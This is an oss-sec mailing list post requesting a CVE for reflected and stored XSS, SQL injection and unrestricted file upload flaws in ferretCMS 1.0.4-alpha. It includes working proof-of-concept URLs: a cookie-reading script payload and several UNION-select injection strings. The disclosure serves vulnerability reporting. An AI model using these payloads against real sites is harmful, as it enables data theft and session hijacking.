oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored XSS- and SQLi-vulnerabilities, unrestricted file upload

From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Fri, 23 Jan 2015 07:14:56 +0100
Hi Josh, Steve, vendors, list.

I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as
an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently
in the alpha development stage.

============
Reflecting XSS
============

http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

============
Stored XSS
============

1.
via login-form of the administrative backend, input field for username:

http://{TARGET}/admin.php

executed here in the logevent functionality in the backend:

http://{TARGET}/admin.php?type=log&action=read

2.

via the new blog-post form, input field for pagetitle:

http://{TARGET}/admin.php?type=page&action=insert&p=

executed, for example, here:

http://{TARGET}/admin.php?type=page&action=read

============
SQLi
============

http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+

http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+

http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+

http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+

http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+

http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

==================
Unrestricted file upload
==================

An administrator has the opportunity to upload arbitrary files via a form
located here on a common ferretCMS installation:

http://{TARGET}/admin.php?type=uploader&action=upload

As these files aren't renamed and stored in the following location, any
unauthenticated user is able to read/execute those files, too:

http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}



Could you please assign a CVE-ID / CVE-IDs for these issues.

Thank you very much!

Greetings.

Steffen Rösemann

References:

[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
[5] http://seclists.org/fulldisclosure/2015/Jan/98
[6]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
Previous By Date Next
Previous By Thread Next

Current thread: